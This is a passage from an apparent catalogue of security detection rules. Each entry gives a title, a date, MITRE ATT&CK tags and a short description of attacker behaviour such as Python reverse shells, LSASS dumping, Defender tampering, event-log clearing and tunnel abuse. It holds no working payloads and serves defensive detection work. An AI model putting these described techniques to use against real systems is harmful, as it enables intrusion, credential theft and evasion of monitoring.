Nov 17, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks

Read More
Python Reverse Shell Execution Via PTY And Socket Modules

Nov 4, 2024 · attack.execution ·
Share on:

Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.

Read More
Python Spawning Pretty TTY Via PTY Module

Nov 4, 2024 · attack.execution attack.t1059 ·
Share on:

Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.

Read More
Antivirus Exploitation Framework Detection

Nov 4, 2024 · attack.execution attack.t1203 attack.command-and-control attack.t1219 ·
Share on:

Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Read More
Antivirus Hacktool Detection

Nov 4, 2024 · attack.execution attack.t1204 ·
Share on:

Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Read More
Antivirus Password Dumper Detection

Nov 4, 2024 · attack.credential-access attack.t1003 attack.t1558 attack.t1003.001 attack.t1003.002 ·
Share on:

Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Read More
Antivirus Ransomware Detection

Nov 4, 2024 · attack.t1486 ·
Share on:

Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Read More
Antivirus Relevant File Paths Alerts

Nov 4, 2024 · attack.resource-development attack.t1588 ·
Share on:

Detects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Read More
Antivirus Web Shell Detection

Nov 4, 2024 · attack.persistence attack.t1505.003 ·
Share on:

Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.

Read More
Monero Crypto Coin Mining Pool Lookup

Nov 4, 2024 · attack.impact attack.t1496 attack.exfiltration attack.t1567 ·
Share on:

Detects suspicious DNS queries to Monero mining pools

Read More
.RDP File Created by Outlook Process

Nov 4, 2024 · attack.defense-evasion ·
Share on:

Detects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use RDP files as attachments.

Read More
Paste sharing url in reverse order

Nov 4, 2024 ·
Share on:

Paste sharing url in reverse order

Read More
Potentially Suspicious Command Executed Via Run Dialog Box - Registry

Nov 1, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.

Read More
.RDP File Created By Uncommon Application

Nov 1, 2024 · attack.defense-evasion ·
Share on:

Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.

Read More
Binary Proxy Execution Via Dotnet-Trace.EXE

Nov 1, 2024 · attack.execution attack.defense-evasion attack.t1218 ·
Share on:

Detects commandline arguments for executing a child process via dotnet-trace.exe

Read More
Cloudflared Portable Execution

Nov 1, 2024 · attack.command-and-control attack.t1090.001 ·
Share on:

Detects the execution of the "cloudflared" binary from a non standard location.

Read More
Cloudflared Quick Tunnel Execution

Nov 1, 2024 · attack.command-and-control attack.t1090.001 ·
Share on:

Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.

Read More
Cloudflared Tunnel Connections Cleanup

Nov 1, 2024 · attack.command-and-control attack.t1102 attack.t1090 attack.t1572 ·
Share on:

Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.

Read More
Cloudflared Tunnel Execution

Nov 1, 2024 · attack.command-and-control attack.t1102 attack.t1090 attack.t1572 ·
Share on:

Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.

Read More
Cloudflared Tunnels Related DNS Requests

Nov 1, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Read More
Compressed File Creation Via Tar.EXE

Nov 1, 2024 · attack.collection attack.exfiltration attack.t1560 attack.t1560.001 ·
Share on:

Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.

Read More
Compressed File Extraction Via Tar.EXE

Nov 1, 2024 · attack.collection attack.exfiltration attack.t1560 attack.t1560.001 ·
Share on:

Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.

Read More
Cscript/Wscript Potentially Suspicious Child Process

Nov 1, 2024 · attack.execution ·
Share on:

Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.

Read More
Enable LM Hash Storage

Nov 1, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

Read More
Firewall Configuration Discovery Via Netsh.EXE

Nov 1, 2024 · attack.discovery attack.t1016 ·
Share on:

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

Read More
Forfiles.EXE Child Process Masquerading

Nov 1, 2024 · attack.defense-evasion attack.t1036 ·
Share on:

Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.

Read More
HackTool - EDRSilencer Execution

Nov 1, 2024 · attack.defense-evasion attack.t1562 ·
Share on:

Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.

Read More
HackTool - EfsPotato Named Pipe Creation

Nov 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 ·
Share on:

Detects the pattern of a pipe name as used by the hack tool EfsPotato

Read More
HackTool - NoFilter Execution

Nov 1, 2024 · attack.privilege-escalation attack.t1134 attack.t1134.001 ·
Share on:

Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators

Read More
Potential Base64 Decoded From Images

Nov 1, 2024 · attack.defense-evasion attack.t1140 ·
Share on:

Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.

Read More
Potential Direct Syscall of NtOpenProcess

Nov 1, 2024 · attack.execution attack.t1106 ·
Share on:

Detects potential calls to NtOpenProcess directly from NTDLL.

Read More
Potential Persistence Via AppCompat RegisterAppRestart Layer

Nov 1, 2024 · attack.persistence attack.t1546.011 ·
Share on:

Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.

Read More
Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE

Nov 1, 2024 · attack.execution attack.t1059.003 attack.t1105 attack.t1218 detection.emerging-threats ·
Share on:

Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.

Read More
Potential PowerShell Execution Policy Tampering

Nov 1, 2024 · attack.defense-evasion ·
Share on:

Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution

Read More
Potentially Suspicious AccessMask Requested From LSASS

Nov 1, 2024 · attack.credential-access car.2019-04-004 attack.t1003.001 ·
Share on:

Detects process handle on LSASS process with certain access mask

Read More
Potentially Suspicious Command Targeting Teams Sensitive Files

Nov 1, 2024 · attack.credential-access attack.t1528 ·
Share on:

Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.

Read More
Potentially Suspicious Desktop Background Change Using Reg.EXE

Nov 1, 2024 · attack.defense-evasion attack.impact attack.t1112 attack.t1491.001 ·
Share on:

Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

Read More
Potentially Suspicious Desktop Background Change Via Registry

Nov 1, 2024 · attack.defense-evasion attack.impact attack.t1112 attack.t1491.001 ·
Share on:

Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

Read More
PSScriptPolicyTest Creation By Uncommon Process

Nov 1, 2024 · attack.defense-evasion ·
Share on:

Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.

Read More
Renamed Cloudflared.EXE Execution

Nov 1, 2024 · attack.command-and-control attack.t1090.001 ·
Share on:

Detects the execution of a renamed "cloudflared" binary.

Read More
Suspicious File Creation Activity From Fake Recycle.Bin Folder

Nov 1, 2024 · attack.persistence attack.defense-evasion ·
Share on:

Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware

Read More
Suspicious Greedy Compression Using Rar.EXE

Nov 1, 2024 · attack.execution attack.t1059 ·
Share on:

Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes

Read More
Suspicious Process Execution From Fake Recycle.Bin Folder

Nov 1, 2024 · attack.persistence attack.defense-evasion ·
Share on:

Detects process execution from a fake recycle bin folder, often used to avoid security solution.

Read More
Suspicious Wordpad Outbound Connections

Nov 1, 2024 · attack.defense-evasion attack.command-and-control ·
Share on:

Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.

Read More
System Information Discovery Using Ioreg

Nov 1, 2024 · attack.discovery attack.t1082 ·
Share on:

Detects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.

Read More
System Information Discovery Using sw_vers

Nov 1, 2024 · attack.discovery attack.t1082 ·
Share on:

Detects the use of "sw_vers" for system information discovery

Read More
System Information Discovery Using System_Profiler

Nov 1, 2024 · attack.discovery attack.defense-evasion attack.t1082 attack.t1497.001 ·
Share on:

Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.

Read More
System Integrity Protection (SIP) Disabled

Nov 1, 2024 · attack.discovery attack.t1518.001 ·
Share on:

Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.

Read More
System Integrity Protection (SIP) Enumeration

Nov 1, 2024 · attack.discovery attack.t1518.001 ·
Share on:

Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.

Read More
Tamper Windows Defender - PSClassic

Nov 1, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.

Read More
Tamper Windows Defender - ScriptBlockLogging

Nov 1, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.

Read More
Uncommon Child Process Of Conhost.EXE

Nov 1, 2024 · attack.defense-evasion attack.t1202 ·
Share on:

Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.

Read More
Uncommon File Created In Office Startup Folder

Nov 1, 2024 · attack.resource-development attack.t1587.001 ·
Share on:

Detects the creation of a file with an uncommon extension in an Office application startup folder

Read More
Uncommon System Information Discovery Via Wmic.EXE

Nov 1, 2024 · attack.discovery attack.t1082 ·
Share on:

Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.

Read More
BITS Transfer Job Download From File Sharing Domains

Oct 25, 2024 · attack.defense-evasion attack.persistence attack.t1197 ·
Share on:

Detects BITS transfer job downloading files from a file sharing domain.

Read More
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder

Oct 25, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.

Read More
New Connection Initiated To Potential Dead Drop Resolver Domain

Oct 25, 2024 · attack.command-and-control attack.t1102 attack.t1102.001 ·
Share on:

Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.

Read More
Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE

Oct 25, 2024 · attack.execution ·
Share on:

Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe

Read More
Suspicious File Download From File Sharing Domain Via Curl.EXE

Oct 25, 2024 · attack.execution ·
Share on:

Detects potentially suspicious file download from file sharing domains using curl.exe

Read More
Suspicious File Download From File Sharing Domain Via Wget.EXE

Oct 25, 2024 · attack.execution ·
Share on:

Detects potentially suspicious file downloads from file sharing domains using wget.exe

Read More
Suspicious File Download From File Sharing Websites - File Stream

Oct 25, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004 ·
Share on:

Detects the download of suspicious file type from a well-known file and paste sharing domain

Read More
Unusual File Download From File Sharing Websites - File Stream

Oct 25, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004 ·
Share on:

Detects the download of suspicious file type from a well-known file and paste sharing domain

Read More
HackTool - Certipy Execution

Oct 8, 2024 · attack.discovery attack.credential-access attack.t1649 ·
Share on:

Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.

Read More
Alternate PowerShell Hosts Pipe

Oct 8, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

Read More
Disable Windows Defender Functionalities Via Registry Keys

Oct 8, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects when attackers or tools disable Windows Defender functionalities via the Windows registry

Read More
LSASS Process Memory Dump Files

Oct 8, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.

Read More
Potentially Suspicious JWT Token Search Via CLI

Oct 6, 2024 · attack.credential-access attack.t1528 ·
Share on:

Detects possible search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". This string is used as an anchor to look for the start of the JWT token used by microsoft office and similar apps.

Read More
Potential Python DLL SideLoading

Oct 6, 2024 · attack.defense-evasion attack.t1574.002 ·
Share on:

Detects potential DLL sideloading of Python DLL files.

Read More
ETW Logging/Processing Option Disabled On IIS Server

Oct 6, 2024 · attack.defense-evasion attack.t1562.002 attack.t1505.004 ·
Share on:

Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option.

Read More
HTTP Logging Disabled On IIS Server

Oct 6, 2024 · attack.defense-evasion attack.t1562.002 attack.t1505.004 ·
Share on:

Detects changes to of the IIS server configuration in order to disable HTTP logging for successful requests.

Read More
New Module Module Added To IIS Server

Oct 6, 2024 · attack.defense-evasion attack.persistence attack.t1562.002 attack.t1505.004 ·
Share on:

Detects the addition of a new module to an IIS server.

Read More
Previously Installed IIS Module Was Removed

Oct 6, 2024 · attack.defense-evasion attack.persistence attack.t1562.002 attack.t1505.004 ·
Share on:

Detects the removal of a previously installed IIS module.

Read More
Add Potential Suspicious New Download Source To Winget

Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1059 ·
Share on:

Detects usage of winget to add new potentially suspicious download sources

Read More
Arbitrary File Download Via IMEWDBLD.EXE

Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218 ·
Share on:

Detects usage of "IMEWDBLD.exe" to download arbitrary files

Read More
Arbitrary File Download Via MSEDGE_PROXY.EXE

Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218 ·
Share on:

Detects usage of "msedge_proxy.exe" to download arbitrary files

Read More
Arbitrary File Download Via Squirrel.EXE

Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218 ·
Share on:

Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

Read More
Chromium Browser Instance Executed With Custom Extension

Oct 1, 2024 · attack.persistence attack.t1176 ·
Share on:

Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension

Read More
Disable Internal Tools or Feature in Registry

Oct 1, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)

Read More
DNS Query To Devtunnels Domain

Oct 1, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Read More
DNS Query To Visual Studio Code Tunnels Domain

Oct 1, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Read More
Elevated System Shell Spawned From Uncommon Parent Location

Oct 1, 2024 · attack.privilege-escalation attack.defense-evasion attack.execution attack.t1059 ·
Share on:

Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.

Read More
Eventlog Cleared

Oct 1, 2024 · attack.defense-evasion attack.t1070.001 car.2016-04-002 ·
Share on:

One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution

Read More
Execution of Suspicious File Type Extension

Oct 1, 2024 · attack.defense-evasion ·
Share on:

Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.

Read More
F5 BIG-IP iControl Rest API Command Execution - Proxy

Oct 1, 2024 · attack.initial-access attack.t1190 ·
Share on:

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

Read More
F5 BIG-IP iControl Rest API Command Execution - Webserver

Oct 1, 2024 · attack.execution attack.t1190 ·
Share on:

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

Read More
HackTool - Generic Process Access

Oct 1, 2024 · attack.credential-access attack.t1003.001 attack.s0002 ·
Share on:

Detects process access requests from hacktool processes based on their default image name

Read More
HackTool - WinPwn Execution

Oct 1, 2024 · attack.credential-access attack.defense-evasion attack.discovery attack.execution attack.privilege-escalation attack.t1046 attack.t1082 attack.t1106 attack.t1518 attack.t1548.002 attack.t1552.001 attack.t1555 attack.t1555.003 ·
Share on:

Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.

Read More
HackTool - WinPwn Execution - ScriptBlock

Oct 1, 2024 · attack.credential-access attack.defense-evasion attack.discovery attack.execution attack.privilege-escalation attack.t1046 attack.t1082 attack.t1106 attack.t1518 attack.t1548.002 attack.t1552.001 attack.t1555 attack.t1555.003 ·
Share on:

Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.

Read More
Important Windows Eventlog Cleared

Oct 1, 2024 · attack.defense-evasion attack.t1070.001 car.2016-04-002 ·
Share on:

Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution

Read More
Lace Tempest Cobalt Strike Download

Oct 1, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team

Read More
Lace Tempest File Indicators

Oct 1, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7

Read More
Lace Tempest Malware Loader Execution

Oct 1, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team

Read More
Lace Tempest PowerShell Evidence Eraser

Oct 1, 2024 · attack.execution attack.t1059.001 detection.emerging-threats ·
Share on:

Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team

Read More
Lace Tempest PowerShell Launcher

Oct 1, 2024 · attack.execution attack.t1059.001 detection.emerging-threats ·
Share on:

Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team

Read More
Load Of RstrtMgr.DLL By A Suspicious Process

Oct 1, 2024 · attack.impact attack.defense-evasion attack.t1486 attack.t1562.001 ·
Share on:

Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.

Read More
Load Of RstrtMgr.DLL By An Uncommon Process

Oct 1, 2024 · attack.impact attack.defense-evasion attack.t1486 attack.t1562.001 ·
Share on:

Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.

Read More
Malicious Driver Load

Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068 ·
Share on:

Detects loading of known malicious drivers via their hash.

Read More
Malicious Driver Load By Name

Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068 ·
Share on:

Detects loading of known malicious drivers via the file name of the drivers.

Read More
Network Connection Initiated To DevTunnels Domain

Oct 1, 2024 · attack.exfiltration attack.t1567.001 ·
Share on:

Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Read More
Network Connection Initiated To Visual Studio Code Tunnels Domain

Oct 1, 2024 · attack.exfiltration attack.t1567.001 ·
Share on:

Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Read More
New Netsh Helper DLL Registered From A Suspicious Location

Oct 1, 2024 · attack.persistence attack.t1546.007 ·
Share on:

Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

Read More
Permission Misconfiguration Reconnaissance Via Findstr.EXE

Oct 1, 2024 · attack.credential-access attack.t1552.006 ·
Share on:

Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.

Read More
Portable Gpg.EXE Execution

Oct 1, 2024 · attack.impact attack.t1486 ·
Share on:

Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.

Read More
Potential CVE-2023-46214 Exploitation Attempt

Oct 1, 2024 · attack.lateral-movement attack.t1210 cve.2023-46214 detection.emerging-threats ·
Share on:

Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing

Read More
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp

Oct 1, 2024 · attack.t1021.003 attack.lateral-movement ·
Share on:

Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.

Read More
Potential File Download Via MS-AppInstaller Protocol Handler

Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218 ·
Share on:

Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache<RANDOM-8-CHAR-DIRECTORY>"

Read More
Potential Linux Process Code Injection Via DD Utility

Oct 1, 2024 · attack.defense-evasion attack.t1055.009 ·
Share on:

Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

Read More
Potential Persistence Via Netsh Helper DLL - Registry

Oct 1, 2024 · attack.persistence attack.t1546.007 ·
Share on:

Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

Read More
Potential Process Hollowing Activity

Oct 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055.012 ·
Share on:

Detects when a memory process image does not match the disk image, indicative of process hollowing.

Read More
Potentially Suspicious Electron Application CommandLine

Oct 1, 2024 · attack.execution ·
Share on:

Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.

Read More
Potentially Suspicious GrantedAccess Flags On LSASS

Oct 1, 2024 · attack.credential-access attack.t1003.001 attack.s0002 ·
Share on:

Detects process access requests to LSASS process with potentially suspicious access flags

Read More
PowerShell Execution With Potential Decryption Capabilities

Oct 1, 2024 · attack.execution ·
Share on:

Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.

Read More
Process Proxy Execution Via Squirrel.EXE

Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218 ·
Share on:

Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

Read More
Remote Thread Creation Via PowerShell In Uncommon Target

Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218.011 attack.t1059.001 ·
Share on:

Detects the creation of a remote thread from a Powershell process in an uncommon target process

Read More
Remote XSL Execution Via Msxsl.EXE

Oct 1, 2024 · attack.defense-evasion attack.t1220 ·
Share on:

Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.

Read More
Security Tools Keyword Lookup Via Findstr.EXE

Oct 1, 2024 · attack.discovery attack.t1518.001 ·
Share on:

Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.

Read More
Suspicious Chromium Browser Instance Executed With Custom Extension

Oct 1, 2024 · attack.persistence attack.t1176 ·
Share on:

Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension

Read More
Suspicious Path In Keyboard Layout IME File Registry Value

Oct 1, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

Read More
Suspicious Shim Database Patching Activity

Oct 1, 2024 · attack.persistence attack.t1546.011 ·
Share on:

Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.

Read More
Uncommon Extension In Keyboard Layout IME File Registry Value

Oct 1, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

Read More
Unusual Parent Process For Cmd.EXE

Oct 1, 2024 · attack.execution attack.t1059 ·
Share on:

Detects suspicious parent process for cmd.exe

Read More
Vulnerable Driver Load

Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068 ·
Share on:

Detects loading of known vulnerable drivers via their hash.

Read More
Vulnerable Driver Load By Name

Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068 ·
Share on:

Detects the load of known vulnerable drivers via the file name of the drivers.

Read More
Whoami.EXE Execution Anomaly

Oct 1, 2024 · attack.discovery attack.t1033 car.2016-03-001 ·
Share on:

Detects the execution of whoami.exe with suspicious parent processes.

Read More
Whoami.EXE Execution From Privileged Process

Oct 1, 2024 · attack.privilege-escalation attack.discovery attack.t1033 ·
Share on:

Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors

Read More
Whoami.EXE Execution With Output Option

Oct 1, 2024 · attack.discovery attack.t1033 car.2016-03-001 ·
Share on:

Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.

Read More
Linux HackTool Execution

Sep 22, 2024 · attack.execution attack.resource-development attack.t1587 ·
Share on:

Detects known hacktool execution based on image name.

Read More
Linux Network Service Scanning Tools Execution

Sep 22, 2024 · attack.discovery attack.t1046 ·
Share on:

Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.

Read More
Remote Access Tool - MeshAgent Command Execution via MeshCentral

Sep 22, 2024 · attack.command-and-control attack.t1219 ·
Share on:

Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.

Read More
Windows Defender Exclusion Registry Key - Write Access Requested

Sep 22, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

